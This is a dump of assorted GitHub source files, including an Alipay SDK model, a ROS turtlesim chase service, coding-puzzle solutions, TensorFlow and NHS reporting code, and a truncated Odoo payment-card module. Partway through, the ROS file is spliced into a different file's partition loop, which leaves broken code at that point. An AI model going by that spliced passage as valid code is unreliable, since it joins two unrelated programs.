+{"seq_id":"70839506223","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nimport json\n\nfrom alipay.aop.api.constant.ParamConstants import *\n\n\nclass AlipayCommerceIotMsgcenterSendModel(object):\n\n def __init__(self):\n self._content = None\n self._datetime = None\n self._ext_info = None\n self._is_support_link = None\n self._link = None\n self._title = None\n self._type = None\n self._user_id = None\n\n @property\n def content(self):\n return self._content\n\n @content.setter\n def content(self, value):\n self._content = value\n @property\n def datetime(self):\n return self._datetime\n\n @datetime.setter\n def datetime(self, value):\n self._datetime = value\n @property\n def ext_info(self):\n return self._ext_info\n\n @ext_info.setter\n def ext_info(self, value):\n self._ext_info = value\n @property\n def is_support_link(self):\n return self._is_support_link\n\n @is_support_link.setter\n def is_support_link(self, value):\n self._is_support_link = value\n @property\n def link(self):\n return self._link\n\n @link.setter\n def link(self, value):\n self._link = value\n @property\n def title(self):\n return self._title\n\n @title.setter\n def title(self, value):\n self._title = value\n @property\n def type(self):\n return self._type\n\n @type.setter\n def type(self, value):\n self._type = value\n @property\n def user_id(self):\n return self._user_id\n\n @user_id.setter\n def user_id(self, value):\n self._user_id = value\n\n\n def to_alipay_dict(self):\n params = dict()\n if self.content:\n if hasattr(self.content, 'to_alipay_dict'):\n params['content'] = self.content.to_alipay_dict()\n else:\n params['content'] = self.content\n if self.datetime:\n if hasattr(self.datetime, 'to_alipay_dict'):\n params['datetime'] = self.datetime.to_alipay_dict()\n else:\n params['datetime'] = self.datetime\n if self.ext_info:\n if hasattr(self.ext_info, 'to_alipay_dict'):\n params['ext_info'] = self.ext_info.to_alipay_dict()\n else:\n params['ext_info'] = self.ext_info\n if self.is_support_link:\n if hasattr(self.is_support_link, 'to_alipay_dict'):\n params['is_support_link'] = self.is_support_link.to_alipay_dict()\n else:\n params['is_support_link'] = self.is_support_link\n if self.link:\n if hasattr(self.link, 'to_alipay_dict'):\n params['link'] = self.link.to_alipay_dict()\n else:\n params['link'] = self.link\n if self.title:\n if hasattr(self.title, 'to_alipay_dict'):\n params['title'] = self.title.to_alipay_dict()\n else:\n params['title'] = self.title\n if self.type:\n if hasattr(self.type, 'to_alipay_dict'):\n params['type'] = self.type.to_alipay_dict()\n else:\n params['type'] = self.type\n if self.user_id:\n if hasattr(self.user_id, 'to_alipay_dict'):\n params['user_id'] = self.user_id.to_alipay_dict()\n else:\n params['user_id'] = self.user_id\n return params\n\n @staticmethod\n def from_alipay_dict(d):\n if not d:\n return None\n o = AlipayCommerceIotMsgcenterSendModel()\n if 'content' in d:\n o.content = d['content']\n if 'datetime' in d:\n o.datetime = d['datetime']\n if 'ext_info' in d:\n o.ext_info = d['ext_info']\n if 'is_support_link' in d:\n o.is_support_link = d['is_support_link']\n if 'link' in d:\n o.link = d['link']\n if 'title' in d:\n o.title = d['title']\n if 'type' in d:\n o.type = d['type']\n if 'user_id' in d:\n o.user_id = d['user_id']\n return 
o\n\n\n","repo_name":"antopen/alipay-sdk-python","sub_path":"alipay/aop/api/domain/AlipayCommerceIotMsgcenterSendModel.py","file_name":"AlipayCommerceIotMsgcenterSendModel.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"91"}
+{"seq_id":"34496621551","text":"#!/usr/bin/env python\n\nimport rospy\nimport math\n\nfrom turtlesim.srv import Spawn, SpawnRequest, SpawnResponse, Kill, KillRequest, KillResponse\nfrom turtlesim.msg import Pose\nfrom geometry_msgs.msg import Twist\nfrom ejer2.srv import RespuestaServicio, RespuestaServicioRequest, RespuestaServicioResponse\n\ndef crearTortuga(nombre,x,y,theta):\n\n rospy.wait_for_service('/spawn')\n servicio = rospy.ServiceProxy('/spawn',Spawn)\n\n arg = SpawnRequest()\n arg.x = float(x)\n arg.y = float(y)\n arg.theta = float(theta)\n arg.name = str(nombre)\n\n result = servicio(arg)\n\n print(\"Tortuga creada:\",result.name)\n\ndef borrarTortuga(nombre):\n\n rospy.wait_for_service('/kill')\n servicio = rospy.ServiceProxy('/kill',Kill)\n\n arg = KillRequest()\n arg.name = str(nombre)\n\n result = servicio(arg)\n print(\"Tortuga borrada:\",nombre)\n\ndef callbackPresa(msg):\n global presa_x, presa_y, presa_theta, presa_linear, presa_angular, recibi_presa\n presa_x = msg.x\n presa_y = msg.y\n presa_theta = msg.theta\n presa_linear = msg.linear_velocity\n presa_angular = msg.angular_velocity\n\n recibi_presa = True\n\ndef callbackDepredador(msg):\n global depredador_x, depredador_y, depredador_theta, depredador_linear, depredador_angular, recibi_depredador\n depredador_x = msg.x\n depredador_y = msg.y\n depredador_theta = msg.theta\n depredador_linear = msg.linear_velocity\n depredador_angular = msg.angular_velocity\n\n recibi_depredador = True\n\ndef callbackService(request):\n umbral = int(request.distancia)\n\n crearTortuga(\"presa\",5,10,3.1416)\n crearTortuga(\"depredador\",4.9,5,6)\n borrarTortuga(\"turtle1\")\n\n # nos conectamos al publicador de velocidades\n pubPresaVel = rospy.Publisher(\"/presa/cmd_vel\", Twist)\n pubDepredadorVel = rospy.Publisher(\"/depredador/cmd_vel\", Twist)\n\n susPresa = rospy.Subscriber('/presa/pose',Pose,callbackPresa)\n susDepredador = rospy.Subscriber('/depredador/pose',Pose,callbackDepredador)\n\n rate = rospy.Rate(4)\n # esperamos a tener los primeros datos de las tortugas\n while (not recibi_presa and not recibi_depredador):\n rate.sleep()\n\n # calculo primera distancia\n xb = presa_x - depredador_x \n yb = presa_y - depredador_y \n distancia = math.sqrt(math.pow(xb,2)+math.pow(yb,2))\n\n while distancia>umbral and not rospy.is_shutdown():\n vel_linear_x = 1.5 * math.sqrt(math.pow((presa_x - depredador_x),2) + math.pow((presa_y - depredador_y),2))\n vel_angular_z = 4 * (math.atan2(presa_y - depredador_y, presa_x - depredador_x) - depredador_theta)\n\n xb = presa_x - depredador_x \n yb = presa_y - depredador_y \n distancia = math.sqrt(math.pow(xb,2)+math.pow(yb,2))\n\n twistPresa = Twist()\n twistPresa.linear.x = float(0.3)\n twistPresa.angular.z = float(0.08)\n\n twistDepredador = Twist()\n twistDepredador.linear.x = float(vel_linear_x * 0.91)\n twistDepredador.angular.z = float(vel_angular_z)\n\n pubPresaVel.publish(twistPresa)\n pubDepredadorVel.publish(twistDepredador) \n\n rate.sleep() \n\n # detenemos el depredador\n twistDep = Twist()\n twistDep.linear.x = float(0)\n twistDep.angular.z = float(0)\n pubDepredadorVel.publish(twistDep)\n\n tret = RespuestaServicioResponse()\n # tomo correcto o no si se ha aproximado lo suficiente\n tret.correcto = distanciam): \n p[w][m] = p[w-m][m-1] + p[w][m-1]\n\ndef answer(n):\n fillP();\n return p[n][n] - 1;\n\nimport time\nstart_time = time.time()\nprint(answer(20))\nend_time = time.time()\n\nprint(\"Elapsed 
time:\",end_time-start_time)\n","repo_name":"dorairajsanjay/foobar_stairs","sub_path":"split_frominternet.py","file_name":"split_frominternet.py","file_ext":"py","file_size_in_byte":757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"10845875326","text":"\"\"\"\nPyPy3 풀이\n\n풀이시간 : 2시간 5분\n\n[시간 초과로 두드려 맞은 과정]\n1. 처음엔 각 위치를 heapq(Priority Queue)로 저장하고, 여름 + 가을 + 겨울을 합쳤음. => 시간초과\n2. 3차원 list + 정렬로 바꿔봄\n3. dictionary(HashMap)로 저장해서 key: 나무 나이, value: 나무 개수로 계산해봄. (근데 Python3으로 통과하려면 이렇게 해야하네..?)\n3. 죽은 나무를 저장하던 3차원 list를 제거\n4. 질문 게시판에서 deque()를 보고 적용 + sys.stdin.readline\n - 나무를 뺄때는 popleft, 번식으로 넣을땐 appendleft(1)\n - https://www.acmicpc.net/board/view/110170\n - deque로 번식으로 태어난 나이가 1인 나무만 계속 왼쪽에 넣어주면 정렬할 필요가 없음\n5. deepcopy 제거\n\n욕나옴\n\"\"\"\nimport sys\nfrom collections import deque\n\ninput = sys.stdin.readline\nN, M, K = map(int, input().split())\n\n# 같은 1×1 크기의 칸에 여러 개의 나무가 심어져 있을 수도 있다.\ntree = [[deque() for _ in range(N)] for _ in range(N)]\nfood = [[5] * N for _ in range(N)]\nrobot = list(list(map(int, input().split())) for _ in range(N))\n\ndr = [1, 1, 1, 0, 0, -1, -1, -1]\ndc = [0, 1, -1, 1, -1, 0, 1, -1]\n\n\ndef in_range(r, c):\n return 0 <= r < N and 0 <= c < N\n\n\ndef spring():\n \"\"\"\n 나무가 자신의 나이만큼 양분을 먹고, 나이가 1 증가한다.\n 각각의 나무는 나무가 있는 1×1 크기의 칸에 있는 양분만 먹을 수 있다.\n 하나의 칸에 여러 개의 나무가 있다면, 나이가 어린 나무부터 양분을 먹는다.\n 만약, 땅에 양분이 부족해 자신의 나이만큼 양분을 먹을 수 없는 나무는 양분을 먹지 못하고 즉시 죽는다.\n \"\"\"\n grow = [[deque() for _ in range(N)] for _ in range(N)] # 새로 자라난 나무\n\n for r in range(N):\n for c in range(N):\n if tree[r][c]:\n dead = 0 # 바로 food에 반영하면 겹침\n for age in tree[r][c]:\n if food[r][c] >= age:\n grow[r][c].append(age+1)\n food[r][c] -= age\n else:\n dead += (age // 2) # 여기서 '여름' 처리\n food[r][c] += dead\n # 1씩 자란 나무들 복붙\n tree[r][c] = grow[r][c]\n\n\ndef autumn():\n \"\"\"\n 나무가 번식한다. 번식하는 나무는 나이가 5의 배수이어야 하며, 인접한 8개의 칸에 나이가 1인 나무가 생긴다.\n 상도의 땅을 벗어나는 칸에는 나무가 생기지 않는다.\n \"\"\"\n for r in range(N):\n for c in range(N):\n for age in tree[r][c]:\n if age % 5 == 0:\n for d in range(8):\n nr, nc = r + dr[d], c + dc[d]\n if 0 <= nr < N and 0 <= nc < N:\n tree[nr][nc].appendleft(1)\n food[r][c] += robot[r][c] # 여기서 '겨울' 처리\n\n\ndef get_answer():\n answer = 0\n\n for r in range(N):\n for c in range(N):\n answer += len(tree[r][c])\n\n print(answer)\n\n\ndef solution():\n for _ in range(M):\n x, y, z = map(int, input().split())\n tree[x-1][y-1].append(z)\n\n for _ in range(K):\n spring()\n autumn()\n get_answer()\n\n\nsolution()","repo_name":"pear96/TIL","sub_path":"SS/A형대비/나무재테크_배하은.py","file_name":"나무재테크_배하은.py","file_ext":"py","file_size_in_byte":3361,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"41936838839","text":"#!/usr/bin/env python\n# -*- coding: UTF-8 -*-\n# coding=utf-8 \n\n\"\"\"\n@author: Li Tian\n@contact: 694317828@qq.com\n@software: pycharm\n@file: sample_data_deal1.py\n@time: 2019/2/3 22:00\n@desc: 展示了tf.train.match_filenames_once函数和tf.train.string_input_producer函数的使用方法\n\"\"\"\n\nimport tensorflow as tf\n\n# 使用tf.train.match_filenames_once函数获取文件列表\nfiles = tf.train.match_filenames_once('./data.tfrecords-*')\n\n# 通过tf.train.string_input_producer函数创建输入队列,输入队列中的文件列表为\n# tf.train.match_filenames_once函数获取的文件列表。这里将shuffle参数设为False\n# 来避免随机打乱读文件的顺序。但一般在解决真实问题时,会将shuffle参数设置为True\nfilename_queue = tf.train.string_input_producer(files, shuffle=False)\n\n# 如前面所示读取并解析一个样本\nreader = tf.TFRecordReader()\n_, serialized_example = reader.read(filename_queue)\nfeatures = tf.parse_single_example(\n serialized_example,\n features={\n 'i': tf.FixedLenFeature([], tf.int64),\n 'j': tf.FixedLenFeature([], tf.int64),\n }\n)\n\nwith tf.Session() as sess:\n # 虽然在本段程序中没有声明任何变量,但使用tf.train.match_filenames_once函数时\n # 需要初始化一些变量。\n tf.local_variables_initializer().run()\n print(sess.run(files))\n\n # 声明tf.train.Coordinator类来协同不同线程,并启动线程。\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n\n # 多次执行获取数据的操作\n for i in range(6):\n print(sess.run([features['i'], features['j']]))\n\n # 请求处理的线程停止\n coord.request_stop()\n # 等待,直到处理的线程已经停止\n coord.join(threads)","repo_name":"TinyHandsome/BookStudy","sub_path":"1-books/book2_TensorFlow实战Google深度学习框架(第二版)/figuredata_deal/sample_data_deal1.py","file_name":"sample_data_deal1.py","file_ext":"py","file_size_in_byte":1793,"program_lang":"python","lang":"zh","doc_type":"code","stars":11,"dataset":"github-code","pt":"91"}
+{"seq_id":"35774629956","text":"import csv\nfrom datetime import date, datetime\nfrom pathlib import Path\nfrom typing import Generator\n\nfrom pydantic import ValidationError\n\nfrom helpers.log import log\nfrom mi.reporting.constants import (\n PATH_TO_REPORT_CSV,\n SQL_ALIAS_SEPARATOR_REGEX,\n SQL_FUNCTION_PARAMS_REGEX,\n SQL_SELECT_REGEX,\n SQL_SELECT_SEPARATOR,\n)\nfrom mi.reporting.resources import (\n each_report_sql_statement,\n get_credentials,\n get_lambda_name,\n get_rds_endpoint,\n make_report_path,\n)\nfrom mi.sql_query.model import Response, Sql, SqlQueryEvent, Status\n\n\n@log(\"Created query events\")\ndef each_stored_query_event(\n session,\n workspace: str,\n env: str,\n partition_key: str,\n start_date: str,\n end_date: str,\n) -> Generator[tuple[str, SqlQueryEvent], None, None]:\n credentials = get_credentials(session=session, workspace=workspace)\n endpoint = get_rds_endpoint(session=session, env=env)\n for report_name, statement in each_report_sql_statement():\n yield report_name, SqlQueryEvent(\n sql=Sql(\n statement=statement,\n params={\n \"partition_key\": partition_key,\n \"start_date\": start_date,\n \"end_date\": end_date,\n },\n ),\n endpoint=endpoint,\n **credentials,\n )\n\n\ndef _select_statement_from_sql_query(query: str) -> str:\n try:\n (select,) = SQL_SELECT_REGEX.match(query).groups()\n except:\n raise ValueError(f\"Couldn't find valid SELECT statement in query {query}\")\n return select\n\n\ndef _column_name_from_statement(column_statement: str) -> str:\n \"\"\"column_statement ~ 'foo' or 'foo as FOO' or 'foo AS FOO' --> 'foo'\"\"\"\n parts = SQL_ALIAS_SEPARATOR_REGEX.split(column_statement)\n last_part = parts[-1]\n return last_part.strip()\n\n\ndef _column_names_from_sql_query(query: str):\n select = _select_statement_from_sql_query(query=query)\n _select = SQL_FUNCTION_PARAMS_REGEX.sub(string=select, repl=\"\")\n column_names = list(\n map(_column_name_from_statement, _select.split(SQL_SELECT_SEPARATOR))\n )\n return column_names\n\n\ndef perform_query(\n session, workspace: str, event: SqlQueryEvent\n) -> list[dict[str, any]]:\n function_name = get_lambda_name(workspace=workspace)\n client = session.client(\"lambda\")\n column_names = _column_names_from_sql_query(query=event.sql.statement)\n raw_response = client.invoke(FunctionName=function_name, Payload=event.json())\n _raw_response = raw_response[\"Payload\"].read()\n try:\n response = Response.parse_raw(_raw_response)\n except ValidationError:\n raise Exception(_raw_response)\n if response.status != Status.OK:\n raise Exception(\n f\"\\nSQL event:\\n\\n{event}\\n\\ngot response:\\n\\n{response.outcome}\"\n )\n return [dict(zip(column_names, line)) for line in response.results]\n\n\ndef _get_column_names(data: list[dict]) -> list[str]:\n for row in data:\n return list(row.keys())\n return []\n\n\n@log(\"Wrote report to {__result__}\")\ndef write_csv(\n data: list[dict],\n env: str,\n workspace: str,\n report_name: str,\n path: Path = PATH_TO_REPORT_CSV, # for dependency-injection in unit testing\n today: date = None, # for dependency-injection in unit testing\n now: datetime = None, # for dependency-injection in unit testing\n partition_key: str = None,\n) -> str:\n today = date.today() if today is None else today\n now = datetime.now() if now is None else now\n\n out_path = make_report_path(\n path=path,\n env=env,\n workspace=workspace,\n report_name=report_name,\n today=today,\n now=now,\n partition_key=partition_key,\n )\n column_names = _get_column_names(data=data)\n with open(out_path, 
\"w\") as csv_file:\n writer = csv.DictWriter(\n csv_file, fieldnames=column_names, quoting=csv.QUOTE_NONNUMERIC\n )\n writer.writeheader()\n for line in data:\n writer.writerow(line)\n return out_path\n","repo_name":"NHSDigital/NRLF","sub_path":"mi/reporting/actions.py","file_name":"actions.py","file_ext":"py","file_size_in_byte":4059,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"91"}
+{"seq_id":"25641822288","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 14 21:22:59 2023\n\n@author: yesenia\n\"\"\"\n\nn = int(input())\n\ni = 0\n\nwhile i < 100:\n if 2**i == n:\n print (i)\n break;\n i += 1","repo_name":"yesenia0490/practica_python","sub_path":"omegaup_potenciasdel2.py","file_name":"omegaup_potenciasdel2.py","file_ext":"py","file_size_in_byte":211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"6692138642","text":"A = [1, 2, 4, 5, 7]\nB = [5, 6, 3, 4, 8]\nX=9\n\nN = len(A)\nM = len(B)\n\ndef pairs_with_sum(a,b,n,m, X):\n res= []\n for i in range(n):\n for j in range(m):\n if (a[i] + b[j] == X):\n res.append((i,j))\n print(res)\n\npairs_with_sum(A,B,N, M, X)\n\n# def findPairs(lst, K):\n# res = []\n# while lst:\n# num = lst.pop()\n# diff = K - num\n# if diff in lst:\n# res.append((diff, num))\n#\n# #res.reverse()\n# return res\n#\n#\n# # Driver code\n# lst = [1, 5, 3, 7, 9]\n# K = 12\n# print(findPairs(lst, K))","repo_name":"ETyrion/interviewPrepCodes","sub_path":"codingChallenge/pairsWIthGivenSum.py","file_name":"pairsWIthGivenSum.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"91"}
+{"seq_id":"70011051183","text":"import json\n\n'''\nServe apenas para guardar o estado dos statements \n'''\n\n\nclass Node:\n def __init__(self, arg_name, arg_children=None):\n self.text = {\"name\": arg_name}\n if arg_children is None:\n self.children = []\n else:\n self.children = arg_children\n\n\nclass ParsedTree:\n def __init__(self, root: Node):\n self.chart = {\n \"container\": \"#parsed-tree\",\n \"connectors\": {\n \"type\": \"straight\"\n }\n }\n self.nodeStructure = root\n\n\nclass Wrapper:\n def __init__(self, arg):\n self.JSONParsedTree = arg\n\n\ndef serialize(obj):\n \"\"\"JSON serializer for objects not serializable by default json code\"\"\"\n try:\n return obj.__dict__\n except AttributeError:\n return None\n\n\ndef write(root: Node, filename: str):\n data = json.dumps(ParsedTree(root), default=serialize)\n with open('./%s.json' % filename, 'w') as f:\n f.write(\"JSONParsedTree = \")\n f.write(data)\n","repo_name":"luciojb/compilador-blm","sub_path":"rply/ArvoreJSON.py","file_name":"ArvoreJSON.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"91"}
+{"seq_id":"7455697916","text":"from odoo import api, fields, models, _\nfrom odoo.exceptions import UserError, ValidationError\nfrom odoo.tools import float_compare\nfrom odoo.tools.misc import format_amount\nimport requests\nimport base64\nimport logging\nfrom urllib.parse import urlparse\nimport os\nimport io\nimport logging\nfrom unidecode import unidecode\n\nMEANINGFUL_PARTNER_NAME_MIN_SIZE = 3\nTIMEOUT = 30\n\nlogger = logging.getLogger(__name__)\n\ntry:\n from PIL import Image, ImageOps\nexcept ImportError:\n logger.debug('Cannot import Pillow version >= 6.0.0')\n\n\nclass NewgenPaymentCardTransaction(models.Model):\n _name = 'newgen.payment.card.transaction'\n _description = 'New-generation payment card transaction'\n _inherit = ['mail.thread', 'mail.activity.mixin', 'analytic.mixin']\n _order = 'date desc'\n _check_company_auto = True\n\n name = fields.Char(string='Number', readonly=True, default=lambda self: _(\"New\"))\n company_id = fields.Many2one(\n 'res.company', string='Company', required=True, readonly=True,\n default=lambda self: self.env.company)\n company_currency_id = fields.Many2one(\n 'res.currency', related='company_id.currency_id',\n string=\"Company Currency\", store=True)\n description = fields.Char(\n string='Description', states={'done': [('readonly', True)]})\n unique_import_id = fields.Char(\n string='Unique Identifier', readonly=True, copy=False)\n date = fields.Date(\n string='Bank Transaction Date', required=True, readonly=True,\n help=\"This is the date of the bank transaction written on the \"\n \"bank statement. It may be a few days after the payment date. \"\n \"It is used for the payment move.\")\n payment_date = fields.Datetime(\n string='Payment Date', readonly=True,\n help=\"This is the real date of the payment. It may be a few days \"\n \"before the date of the bank transaction written on the bank \"\n \"statement. It is used for the supplier invoice.\")\n force_invoice_date = fields.Date(\n string='Force Invoice Date', states={'done': [('readonly', True)]})\n card_id = fields.Many2one(\n 'newgen.payment.card', string='Card', readonly=True,\n ondelete='restrict', check_company=True)\n expense_categ_name = fields.Char(\n string='Expense Category Name', readonly=True)\n expense_account_id = fields.Many2one(\n 'account.account', states={'done': [('readonly', True)]},\n domain=\"[('deprecated', '=', False), ('company_id', '=', company_id), ('is_off_balance', '=', False)]\",\n string='Expense Account', check_company=True)\n analytic_distribution = fields.Json(states={'done': [('readonly', True)]})\n country_id = fields.Many2one('res.country', string='Country')\n vendor = fields.Char(string='Vendor', readonly=True)\n vendor_vat = fields.Char(string='Vendor VAT Number', readonly=True)\n partner_id = fields.Many2one(\n 'res.partner', string='Vendor Partner',\n domain=[('parent_id', '=', False)],\n states={'draft': [('readonly', False)]}, ondelete='restrict',\n compute=\"_compute_partner_id\", store=True, precompute=True,\n help=\"By default, all transactions are linked to the generic \"\n \"supplier 'Misc Suppliers'. 
You can change the partner \"\n \"to the real partner of the transaction if you want, but it may not \"\n \"be worth the additionnal work.\")\n transaction_type = fields.Selection([\n ('load', 'Load'),\n ('expense', 'Expense'),\n ], string='Transaction Type', readonly=True)\n autoliquidation = fields.Selection([\n ('intracom', 'Intra-EU'),\n ('extracom', 'Extra-EU'),\n ('none', 'None'),\n ], default='none', string='Auto-Liquidation',\n states={'done': [('readonly', True)]})\n vat_company_currency = fields.Monetary(\n string='VAT Amount',\n # not readonly, because accountant may have to change the value\n currency_field='company_currency_id',\n states={'done': [('readonly', True)]},\n help='VAT Amount in Company Currency')\n vat_rate = fields.Float(\n string='VAT Rate (%)', states={'done': [('readonly', True)]},\n digits=(16, 4),\n help='Main VAT rate of the transaction in percent.')\n total_company_currency = fields.Monetary(\n string='Total Amount in Company Currency',\n currency_field='company_currency_id', readonly=True)\n currency_id = fields.Many2one(\n 'res.currency', string='Expense Currency', readonly=True)\n total_currency = fields.Monetary(\n string='Total Amount in Expense Currency', readonly=True,\n currency_field='currency_id')\n image_url = fields.Char(string='Image URL', readonly=True)\n receipt_lost = fields.Boolean(\n string='Receipt Lost', states={'done': [('readonly', True)]})\n state = fields.Selection([\n ('draft', 'Draft'),\n ('done', 'Done'),\n ], string='State', default='draft', readonly=True)\n receipt_number = fields.Char(string='Receipt Number', readonly=True)\n bank_move_only = fields.Boolean(\n string=\"Generate Bank Move Only\",\n states={'done': [('readonly', True)]},\n help=\"When you process a transaction on which this option is enabled, \"\n \"Odoo will only generate the move in the bank journal, it will not \"\n \"generate a supplier invoice/refund. 
This option is useful when you \"\n \"make a payment in advance and you haven't received the invoice yet.\")\n invoice_id = fields.Many2one(\n 'account.move', string='Invoice', check_company=True,\n states={'done': [('readonly', True)]})\n invoice_payment_state = fields.Selection(\n related='invoice_id.payment_state', string=\"Invoice Payment Status\")\n reconcile_id = fields.Many2one(\n 'account.full.reconcile', string=\"Reconcile\",\n compute='_compute_reconcile_id', readonly=True)\n bank_counterpart_account_id = fields.Many2one(\n 'account.account',\n compute='_compute_bank_counterpart_account_id', store=True, precompute=True,\n readonly=False, states={'done': [('readonly', True)]},\n domain=\"[('deprecated', '=', False), ('company_id', '=', company_id), ('is_off_balance', '=', False)]\",\n string=\"Counter-part of Bank Move\", check_company=True)\n bank_move_id = fields.Many2one(\n 'account.move', string=\"Bank Move\", readonly=True, check_company=True)\n\n _sql_constraints = [(\n 'unique_import_id',\n 'unique(unique_import_id)',\n 'A payment card transaction can be imported only once!')]\n\n @api.model_create_multi\n def create(self, vals_list):\n for vals in vals_list:\n if 'company_id' in vals:\n self = self.with_company(vals['company_id'])\n if vals.get('name', _(\"New\")) == _(\"New\"):\n vals['name'] = self.env['ir.sequence'].next_by_code(\n 'newgen.payment.card.transaction',\n sequence_date=vals.get('date')) or _(\"New\")\n return super().create(vals_list)\n\n @api.depends('bank_move_id')\n def _compute_reconcile_id(self):\n for trans in self:\n reconcile_id = False\n if trans.bank_move_id:\n for line in trans.bank_move_id.line_ids:\n if (\n line.account_id ==\n trans.bank_counterpart_account_id and\n line.full_reconcile_id):\n reconcile_id = line.full_reconcile_id.id\n trans.reconcile_id = reconcile_id\n\n @api.depends(\"partner_id\", \"expense_account_id\")\n def _compute_analytic_distribution(self):\n for trans in self:\n distribution = self.env[\n \"account.analytic.distribution.model\"\n ]._get_distribution(\n {\n \"partner_id\": trans.partner_id.id,\n \"partner_category_id\": trans.partner_id.category_id.ids,\n \"account_prefix\": trans.expense_account_id.code,\n \"company_id\": trans.company_id.id,\n }\n )\n trans.analytic_distribution = distribution or trans.analytic_distribution\n\n @api.depends('invoice_id')\n def _compute_partner_id(self):\n for trans in self:\n if trans.invoice_id:\n partner = trans.invoice_id.commercial_partner_id\n else:\n partner = trans._default_partner()\n trans.partner_id = partner and partner.id or False\n\n def _default_partner(self, raise_if_not_found=False):\n return self.env.ref(\n 'base_newgen_payment_card.misc_supplier',\n raise_if_not_found=raise_if_not_found)\n\n @api.constrains('transaction_type', 'partner_id')\n def _check_transaction(self):\n for trans in self:\n if trans.transaction_type == 'expense' and not trans.partner_id:\n raise ValidationError(_(\n \"Partner missing on expense transaction '%s'.\")\n % trans.display_name)\n\n def open_image_url(self):\n if not self.image_url:\n raise UserError(_(\n \"Missing image URL for transaction %s.\") % self.display_name)\n action = {\n 'type': 'ir.actions.act_url',\n 'url': self.image_url,\n 'target': 'new',\n }\n return action\n\n def unlink(self):\n for trans in self:\n if trans.state == 'done':\n raise UserError(_(\n \"Cannot delete transaction '%s' which is in \"\n \"done state.\") % trans.name)\n return super().unlink()\n\n @api.depends('partner_id', 'transaction_type', 
'company_id')\n def _compute_bank_counterpart_account_id(self):\n for trans in self:\n account_id = False\n if trans.transaction_type == 'load':\n account_id = trans.company_id.transfer_account_id.id or False\n elif trans.transaction_type == 'expense':\n if trans.partner_id:\n account_id = trans.with_company(trans.company_id.id).partner_id.property_account_payable_id.id\n else:\n account_id = self.env['ir.property'].with_company(\n trans.company_id.id)._get(\n 'property_account_payable_id', 'res.partner')\n trans.bank_counterpart_account_id = account_id\n\n def process_line(self):\n for line in self:\n if line.state != 'draft':\n logger.warning(\n 'Skipping transaction %s which is not draft',\n line.name)\n continue\n vals = {'state': 'done'}\n bank_move = line.generate_bank_journal_move()\n vals['bank_move_id'] = bank_move.id\n if line.transaction_type == 'expense':\n if not line.bank_move_only:\n if line.invoice_id:\n self.check_existing_invoice()\n invoice = line.invoice_id\n else:\n invoice = line.generate_invoice()\n vals['invoice_id'] = invoice.id\n rec = line.reconcile(bank_move, invoice)\n vals['reconcile_id'] = rec.id\n line.write(vals)\n return True\n\n def _prepare_bank_journal_move(self):\n self.ensure_one()\n amount = self.total_company_currency\n if self.company_currency_id.compare_amounts(amount, 0) > 0:\n credit = 0\n debit = amount\n else:\n credit = amount * -1\n debit = 0\n if not self.card_id.journal_id:\n raise UserError(_(\n \"Bank Journal not configured on payment card '%s'\")\n % self.card_id.name)\n journal = self.card_id.journal_id\n if not self.bank_counterpart_account_id:\n raise UserError(_(\n \"Counter-part of Bank Move is empty \"\n \"on transaction %s.\") % self.name)\n transaction_type = dict(\n self.fields_get(\n 'transaction_type',\n 'selection')['transaction_type']['selection'])[self.transaction_type]\n ref = '%s (%s)' % (self.name, transaction_type)\n if self.transaction_type == 'expense':\n partner_id = self.partner_id.id\n elif self.transaction_type == 'load':\n partner_id = False\n mvals = {\n 'journal_id': journal.id,\n 'date': self.date,\n 'ref': ref,\n 'line_ids': [\n (0, 0, {\n 'account_id': journal.default_account_id.id,\n 'debit': debit,\n 'credit': credit,\n 'partner_id': partner_id,\n }),\n (0, 0, {\n 'account_id': self.bank_counterpart_account_id.id,\n 'debit': credit,\n 'credit': debit,\n 'partner_id': partner_id,\n }),\n ],\n }\n return mvals\n\n def generate_bank_journal_move(self):\n self.ensure_one()\n vals = self._prepare_bank_journal_move()\n bank_move = self.env['account.move'].create(vals)\n bank_move._post(soft=False)\n return bank_move\n\n def _countries_vat_refund(self):\n return self.company_id.country_id\n\n def _prepare_autoliquidation_taxes(self):\n self.ensure_one()\n assert self.autoliquidation in ('intracom', 'extracom')\n ato = self.env[\"account.tax\"]\n autoliq2categ = {\n 'intracom': 'K',\n 'extracom': 'G',\n }\n domain = [\n ('company_id', '=', self.company_id.id),\n ('type_tax_use', '=', 'purchase'),\n ('unece_type_code', '=', 'VAT'),\n ('amount_type', '=', 'percent'),\n ('amount', '>', 0),\n ('unece_categ_code', '=', autoliq2categ[self.autoliquidation]),\n ]\n if hasattr(ato, 'fr_vat_autoliquidation'):\n domain.append(('fr_vat_autoliquidation', '=', True))\n tax = ato.search(domain, order='amount desc', limit=1)\n if not tax:\n raise UserError(_(\n \"Odoo could not find any %s auto-liquidation tax properly configured \"\n \"in company '%s'.\") % (\n self._fields['autoliquidation'].convert_to_export(\n 
